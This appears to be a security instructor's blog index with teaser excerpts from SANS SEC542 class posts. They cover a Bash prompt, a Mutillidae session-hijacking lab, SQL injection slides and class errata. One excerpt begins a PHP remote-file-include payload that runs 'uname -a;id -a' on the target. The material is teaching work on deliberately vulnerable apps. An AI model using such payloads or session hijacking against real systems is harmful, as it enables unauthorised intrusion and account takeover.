Bash Prompt -PS1

Some students in my SEC542 SANS class noted the funky Bash shell prompt I have for my terminal windows and wanted me to share it. So, this is a post to share it. My Bash shell prompt is: ┌─[HH:MM:SS]─[hostname: PresentWorkingDirectory] └──> $ and looks like this in the terminal when I took a pic of... Continue Reading →

Mutillidae Session Hijacking Lab

Overview This is a list of steps to perform to perform a web application session hijacking attack against a logged-in user of a web app. It uses the wonderful Mutillidae (https://www.owasp.org/index.php/OWASP_Mutillidae_2_Project) vulnerable web application for the victim server, Burp Suite (free or pro, https://portswigger.net/burp/download.html) and a web browser (in this case, I've chosen Firefox). Steps... Continue Reading →

Quick post for my current SEC542 Students

Of course if you aren't one of my students you still can read this. 🙂 In class I showed some extra slides on SQL injection. They are here http://www.slideshare.net/webbreacher/sans-night-talk-sql-injection-exploited Additionally, for the RFI (Remote File Include) examples, I showed a text file with the following in it: <?php $command='uname -a;id -a'; echo "Running the '$command' command:";... Continue Reading →

Errata from my SANS SEC542 Class

This post is just a follow-up for things I spoke about during the SANS Rocky Mountain conference held in Denver, CO in June 2014...well...now.MindMaps for Note-takingAs I mentioned in class, one way that I like to organize information during testing and just when taking notes, is in a MindMap format. There are some gorgeous "infographic-type" MindMaps... Continue Reading →

WordPress.com.

Up ↑

%d bloggers like this: